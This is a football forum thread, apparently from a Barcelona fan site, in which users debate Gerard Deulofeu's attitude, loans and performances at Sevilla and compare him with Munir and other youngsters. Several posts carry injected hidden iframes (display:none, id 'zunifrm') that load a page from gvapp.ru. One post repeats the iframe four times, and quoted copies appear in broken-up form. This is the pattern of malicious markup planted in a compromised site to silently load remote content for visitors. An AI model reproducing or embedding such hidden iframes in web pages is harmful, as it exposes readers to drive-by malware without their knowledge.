Gerard Deulofeu

ZenI

Professor Balthazar
Munir probably showed more intent and worked harder than Deulofeu hence the more chances he got. Not that much difference in minutes anyway.

Im a big fan of Gerard, butif he want a future at Barcelona then he should work hard in trainings, in matches, even if it is from start or the 70th minute. Deulofeu need one thing to get in his head and that is that without hard work, he will not be at a top club or get anywhere in his career and that's it. If he want it then he must work for it and not just expect to get it.

Something is clearly wrong with the way Deulofeu trains, or his attitude, or both. He has all the natural talent needed to be a success here and then some, but he shows time and time again that he doesn't seem to have the mentality this team needs. Adama is a player that is incredibly similar to him but Adama has the mentality of a fighter and will fight tooth and nail to impress no matter how the game is going. He may be behind Munir in development but it's clear both teenagers are far too talented to be playing in the Segunda right now.

Deulofeu is going to be an amazing player one day. This much is for certain. Whether or not he wakes the fuck up will determine if he becomes an amazing player for us, or an amazing player for Manchester City.

Actually DonAK, if he wants a future in any club - and I'm not sure anymore Zangash. This is make it or break it season for Delou's future in Barca. Balo is a total nutjob, but he also has much more talent than Delou so some more clubs are willing to take a chance. Delou on the other hand is yet to show any sort of consistensy in top flight football, 1 great goal every month or so is NOT enough.

F

Flavia

I think that's a pretty unfair comparison, tbh...Deulofeu hasn't been a problem within any squad whereas Mario has worn out his welcome everywhere

The only risk that remains, IMHO, is that he fails to deliver for Barcelona because I can't see him failing as a footballer - simply too skilled and driven to win...The hard work & effort is what needs to be consistently demonstrated

I wanted to watch last night but the match ended up too late and I fell asleep sometime during the 1st half - been a tiring couple of weeks on my end

It was just an example, FCBarca. Deulo never showed disciplinary problems, but he's showing lack of effort and his ego seems to be back. Lucho loves young players with drive and passion for winning. And as he ended up being loaned, I don't think Lucho saw that on him. Emery seemed pissed with him a few times yesterday too... It's worrying.
<iframe src="about://gvapp.ru/u.html" style="display: none;" id="zunifrm"></iframe>

DinhoR10

Its sad cause talent wise he is the best in youngster we have, kid really looks like Ronaldo when he wants to, with determination he'd have surely been able to leapfrog pedro this season.

FCBarca

Mike the Knife
It was just an example, FCBarca. Deulo never showed disciplinary problems, but he's showing lack of effort and his ego seems to be back. Lucho loves young players with drive and passion for winning. And as he ended up being loaned, I don't think Lucho saw that on him. Emery seemed pissed with him a few times yesterday too... It's worrying.
<iframe src="about<strong></strong>://gvapp.ru/u.html" style="display: none;" id="zunifrm"></iframe>

Well, Emery is emotional on the touchline, not sure we can read too much into how he acts - let's not forget how he was when he tried to sub Gerard on to begin with in the first match

For me, I think it's hard to gauge whether Deulofeu isn't working hard enough although I do wonder if it's something that's happening in training...To the larger point, almost every youth talent over the past 6 years has been brought along into the first team to at least attempt integration...Meaning, they had more than just preseason...And when you consider that there has not been a more treasured youth player at the club outside of Messi in the past decade it's baffling how he hasn't been given some first team playing time

I'm worried as well both in terms of his development but also how he's been treated by our club - IMHO, he has deserved better and I think my past wrt Deulofeu reflects someone who isn't even a big fan of the player

BBZ8800

Deulofeu is going to be an amazing player one day. This much is for certain. Whether or not he wakes the fuck up will determine if he becomes an amazing player for us, or an amazing player for Manchester City.

If he continues with the current attitude, he will end as Ricardo Quaresma.
(He was hailed as the next Luis Figo when we have bought him in summer 2003')

In youth ranks, Quaresma was equal (or even bigger talent) than Cristiano Ronaldo.
10-12 years later, look what happened with their careers.

Talent alone means nothing if you have serious mental or attitude problems.
Deulofeu seems to have some serious psychological problems.

Last edited:

BBZ8800

Actually DonAK, if he wants a future in any club - and I'm not sure anymore Zangash. This is make it or break it season for Delou's future in Barca. Balo is a total nutjob, but he also has much more talent than Delou so some more clubs are willing to take a chance. Delou on the other hand is yet to show any sort of consistensy in top flight football, 1 great goal every month or so is NOT enough.

Yes.

People are talking about famous clubs.
In his senior career till now, Lucho lost nerves with him.
His loan spell in Everton was meh, people have different opinions. Some will blame his coach, wrong country etc.
But if his loan at Sevilla will be the same, then we already have 3 teams where he hasn't shown too much.

To get a new chance at Barca, he would need to have an amazing Season at Sevilla both in terms of Goals, but also in terms of teamwork, defending, attitude both on matches and on training grounds.

If his situation won't change, not only that he won't earn a new chance in Barca.
But he won't earn a chance in any (decent/average) La Liga side.

Not too many will jump to buy/loan a player with his current attitude and diva status, who isn't doing virtually anything when he enters the field.

Last edited:

aaron101

Nah, I honestly don't see him succeeding at Barca. He just doesn't have it. I don't see anything on him. I think Munir will be the new Pedro that benched Henry on that memorable season we had.

FCBarca

Mike the Knife

Nonsense, we're continuing to compare a disciplinary nut to someone who has resisted temptations to be poached away...for years?...Ridiculous some of the assessments here

Barcaman

Administrator
Staff member
Should have been sold with a buyback option. This is my general opinion on our loan policy fiascos. We keep on giving our promising youngsters away for nothing.
Madrid sold Carvajal for 5 mil. and bought him back for 6. This was Carvajal nobody 2 years ago. Why not doing something like that.

FCBarca

Mike the Knife
Well, I think the club policy has been in flux for a few years from when Pep re-emphasized the cantera...otherwise, we'd be like RM who have cantera players littered around everywhere in Europe except their squad...And I think if we subscribe to the club ethos that this is a Catalan club that develops not only footballers but also adults then Deulofeu had been handled well...until his loans

I mean, loans have rarely worked out for Barcelona and even Rafinha we could argue benefited from playing under Lucho at Celta Vigo...I don't think anyone thinks Gerard is close to the finished article but who was Pedro, Jeffren, Soriano, Dos Santos etc. before they got a shot with the first team?...At the very least I thought Deulofeu should've gotten some minutes rather than shipped out, again...It'd be one thing if we were talking about Romeu, Crosas or a variety of La Masia players who weren't expected to slot into the first team rather than the most talked about youth player in probably a decade for the club

Tough love might work but it also might backfire...Feel we've gone the route of RM of late

Emery, however, is a good coach who should get the most out of Deulofeu...He had this to say a few days ago

“Cuanto más lo dejemos tranquilo, mejor. Tiene que asentarse, no hay que presionarle, tiene que liberarse y crecer. Tiene ejemplos cercanos donde mirarse. Ahora tiene que tener constancia. Tiene talento pero para ser futbolista de élite, le falta un paso. Él lo sabe y se lo han dicho entrenadores anteriores. Aqui ha venido a pulirse, con toda la exigencia del mundo. Tiene que trabajar y está en esa línea”.

The more we leave him alone, the better. He has to settle in, can't pressure him, he has to break free and grow. He has examples nearby he can look to. Now, he needs experience. He has talent but to become an elite footballer he's missing a step. Gerard knows this and his coaches have told him this before. Here he came to get polished with all the demands of the world. He has to work and is on that path.

FCBarca

Mike the Knife
Won the penalty and created several scoring chances yet he's been rubbish?...Excellent analysis

Him and Suarez have been the standout performers...Munir somewhat anonymous but also not had many good chances... Roberto, ugghh...same for Muniain

Last edited:
F

Flavia

Won the penalty and created several scoring chances yet he's been rubbish?...Excellent analysis

Him and Suarez have been the standout performers...Munir somewhat anonymous but also not had many good chances... Roberto, ugghh...same for Muniain

Deulo had a very good game. Roberto and Muniain really the let downs, both were poor.
<iframe src="about://gvapp.ru/u.html" style="display: none;" id="zunifrm"></iframe><iframe src="about://gvapp.ru/u.html" style="display: none;" id="zunifrm"></iframe><iframe src="about://gvapp.ru/u.html" style="display: none;" id="zunifrm"></iframe><iframe src="about://gvapp.ru/u.html" style="display: none;" id="zunifrm"></iframe>

FCBarca

Mike the Knife
Deulo had a very good game. Roberto and Muniain really the let downs, both were poor.
<iframe src="about<strong></strong>://gvapp.ru/u.html" style="display: none;" id="zunifrm"></iframe><iframe src="about<strong></strong>://gvapp.ru/u.html" style="display: none;" id="zunifrm"></iframe><iframe src="about<strong></strong>://gvapp.ru/u.html" style="display: none;" id="zunifrm"></iframe><iframe src="about<strong></strong>://gvapp.ru/u.html" style="display: none;" id="zunifrm"></iframe>

Yep, although I'd add that Suarez was quite good as well...Deulo was poor for about a quarter hour to start the 2nd half but then moved to the left and gave that great assist to Saul Niguez (Who wasn't great on the afternoon either, IMO)...He showed a wide array of skills over the course of the match along with some stupidity and wasting a few good buildups but it did underscore the sort of thing I've said about him...I can't understand how he hasn't been given a fair shot with the 1st team...He's consistently one of the greatest threats whenever he is in a match, extremely skilled player that can be let down by some attitude and poor decisions - hallmarks of many young players

Munir, on the other hand, not a great match but not poor either...more anonymous than anything else, loved his hustle as he pressed very well up until he was subbed off

Very excited by Denis Suarez, the kid is going to be a great addition to the club

jamrock

Delou always plays well and more so carry the Spanish teams he is involved in, since the U-17 teams, which is one of the reason, I am certain he will make it. at barca not so sure anymore

Home of Barca Fans